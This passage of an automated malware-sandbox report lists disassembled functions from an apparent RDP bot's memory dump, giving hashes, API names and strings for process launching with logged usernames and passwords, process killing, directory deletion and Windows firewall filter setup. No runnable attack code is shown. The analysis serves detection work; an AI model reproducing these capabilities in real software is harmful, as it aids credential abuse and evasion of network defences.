    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
    • Instruction ID: b09454893cffa80c5166c2b32afb758a243d9c7947afc551eeeb0d7fd3e166ea
    • Opcode Fuzzy Hash: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
    • Instruction Fuzzy Hash: 62F0891BB08703A1F966BA05B5427B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
    • Instruction ID: bc301c86fa634eb69e62cedba2ebb7a80ff8b286bc8d778d070b1e5505b098cd
    • Opcode Fuzzy Hash: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
    • Instruction Fuzzy Hash: 3BF0891BB08703A1F966BA05B5427B9D2611F917A6EC945B5CE5C0B7C1DE3DE883A320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
    • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
    • API String ID: 1842180197-3127737957
    • Opcode ID: b7188ef324f93030a506420794d0e2765d507f709723c8909072f9b7107facfe
    • Instruction ID: 80fabab6df1945c4469f3a0e69b31e859f9fc3d8e6198224212d579cd5ab3547
    • Opcode Fuzzy Hash: b7188ef324f93030a506420794d0e2765d507f709723c8909072f9b7107facfe
    • Instruction Fuzzy Hash: C11280A9A0C743A1F638BB02E4423B9E2A0FF44784FC40572D98E476A4DF7CE545B761
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
    • API String ID: 4253334766-1535167640
    • Opcode ID: cdc34806d60c431622bd7d249ddf61cd36df4f0909a0aa9c4113b06195233118
    • Instruction ID: 6d615b2ed00191d83d44627da92afb2a2e05491833f60712e8c8793d5c73c35f
    • Opcode Fuzzy Hash: cdc34806d60c431622bd7d249ddf61cd36df4f0909a0aa9c4113b06195233118
    • Instruction Fuzzy Hash: 33617029E4DB53B5FB247715A4463B8E270AF10394FD406B2E86E4B6D0DFACE844B361
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorLast$Resource$FindLoadfflushfwrite
    • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
    • API String ID: 2123903355-2019010457
    • Opcode ID: a39caf197881b0647ecb2d086e68fb9eb16d6472d07efe5ce341554b0eb9672d
    • Instruction ID: c27cce0d29e4e5d7eaa7f952cccb6da3ea2126a6bc130b6cba68e3aae373c600
    • Opcode Fuzzy Hash: a39caf197881b0647ecb2d086e68fb9eb16d6472d07efe5ce341554b0eb9672d
    • Instruction Fuzzy Hash: 13417F7AA08243AAF764FF29E4415A9B7E0FB08754F800571EA5D837A4EF3CE544EB10
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: AddressProc$HandleLibraryLoadModule
    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
    • API String ID: 384173800-4041758303
    • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
    • Instruction ID: be9921040f9d2b84dcfd57efb5b0f177e7fd78b665092f113b9d4773870da28f
    • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
    • Instruction Fuzzy Hash: 17F0DA2CE4AA17B0FD45FB57FC420B4A364BF48791BC419B2C88D03724EE2CE15AA320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fflushfwriteinet_addrntohl
    • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
    • API String ID: 3255839625-58178811
    • Opcode ID: 86a0a9880a9f3f17d938d5b1defbe13e2daa6b39b9f30897ca9995e595c12992
    • Instruction ID: 47503b6020115aba3a166d5cee638dc17d6eedd4cff50c850c1be26380a381bb
    • Opcode Fuzzy Hash: 86a0a9880a9f3f17d938d5b1defbe13e2daa6b39b9f30897ca9995e595c12992
    • Instruction Fuzzy Hash: BE518C3660CBC695F7319B29B4413EAB7A5EB95780F844124D6CC4BBA9EB3CC185CB50
    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Time$FileSystem
    • String ID:
    • API String ID: 2086374402-0
    • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
    • Instruction ID: cc0808db1938f5ce2545bc7dac2e19633277cda3b5a460b35ce52d360cc3c8b7
    • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
    • Instruction Fuzzy Hash: ABE022AA72890683FF20D609E0417BBA361C7DC384F904830E85DC3B68EA3CD9428B40
    Memory Dump Source
    • Source File: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
    • Instruction ID: d399a581ac06c2f862f6bf37297078c0c2cba322d44349de225a6c42d416e3c9
    • Opcode Fuzzy Hash: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
    • Instruction Fuzzy Hash: F631C68FE8DAE369F65275250C6B1645F91AFB2A217CD44FECE88036C3A80E5C05B321
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
    • Instruction ID: d81fa87d27dd5db5c251060f14dcdad8173c7c0afadf5e57c3b5136f239ec290
    • Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
    • Instruction Fuzzy Hash: 3EA0021A98DC0AD4F6402F01E802171A52CEB06600FC425B0C0A8520558B2CD000A114
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
    • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
    • API String ID: 3326156344-4160762685
    • Opcode ID: 22f98d9e6b6db223fd8ae42b2935bd87373575b709e836097b64c48acc4db2cd
    • Instruction ID: b97430e8b4c2e2f7ee5dc352537c446c0ff4f2079979864507cf7229d20cba48
    • Opcode Fuzzy Hash: 22f98d9e6b6db223fd8ae42b2935bd87373575b709e836097b64c48acc4db2cd
    • Instruction Fuzzy Hash: 3DF16F5CE0C303F2FA7C7655A4C23B8D260AF15745EE004B3CA4E0A6E6DD5DE985B2B2
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
    • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
    • API String ID: 2460052984-4087913290
    • Opcode ID: 25b69e423684d8cc3c50e9745d1972c5188a6e48fb09ee3a5ee5cd9d97fc1147
    • Instruction ID: 33782b5ae88de56168f48f9791853be2fe95a26b0db3d17adeba33ad511c5c9d
    • Opcode Fuzzy Hash: 25b69e423684d8cc3c50e9745d1972c5188a6e48fb09ee3a5ee5cd9d97fc1147
    • Instruction Fuzzy Hash: F5A1C62A90CB83B5FA20BB05E5463F9E361AF94386FD404B2D58F47695DF3CE406A721
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strlen$strcatstrcpy$strcmp
    • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
    • API String ID: 2140730755-3699962909
    • Opcode ID: 495c10b774ece20ef177713593f070f3c0f770e80d0fb8a9a15bc2deafeba13e
    • Instruction ID: af435a34ff52fd3018d0a9eda157ea64f17c7153e987cd6df5583c277dd83e14
    • Opcode Fuzzy Hash: 495c10b774ece20ef177713593f070f3c0f770e80d0fb8a9a15bc2deafeba13e
    • Instruction Fuzzy Hash: 6EC1A66990C783A1FA30BB11A5463FAE371AF84384FD414B2DA8F07685DF6CE506E721
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
    • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
    • API String ID: 3826151639-1775164968
    • Opcode ID: 8bb0ea1736df8d3edf963a2b7853290c56aa09aa1f6c48da0cf8a94ebb2a490f
    • Instruction ID: 5bdd55f4d38deb5aa5a5999b3d84e61bd5373aa3bd90ad594edaaf4d75a3eb15
    • Opcode Fuzzy Hash: 8bb0ea1736df8d3edf963a2b7853290c56aa09aa1f6c48da0cf8a94ebb2a490f
    • Instruction Fuzzy Hash: 3D91BD2EE0C703A1FA647B05E4563B9D262AF84795FD404B2D94F472A4DE3CF881B365
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
    • API String ID: 3629392964-1470975255
    • Opcode ID: 40de52bd017b3b5107fba0dfe13c3a76dcdd154043d1e7d6bf5f23c40a91ae53
    • Instruction ID: a93b2158d916f36942187218d9918166b0dbbd4699f9c14eb1c38a42134a8259
    • Opcode Fuzzy Hash: 40de52bd017b3b5107fba0dfe13c3a76dcdd154043d1e7d6bf5f23c40a91ae53
    • Instruction Fuzzy Hash: 03A1E36660D7C295F721EB15B8413AAB7A1FB82784F444178EACD4BB99EF3DC084DB10
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
    • API String ID: 2990311666-1793103013
    • Opcode ID: fc3b5ae313fded3a9bb40c1c80fe98fb2b1886c9b991d973420dfac19dafbbff
    • Instruction ID: 4d63357fda5637ee1eac720eae072e7fd0eebddf4e942f5b2b686223d0d69f6c
    • Opcode Fuzzy Hash: fc3b5ae313fded3a9bb40c1c80fe98fb2b1886c9b991d973420dfac19dafbbff
    • Instruction Fuzzy Hash: 3291C22660DBC3A5F771EB25A4413AAB7A1EB81780F444134EACC4BB99EF3DC185DB50
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
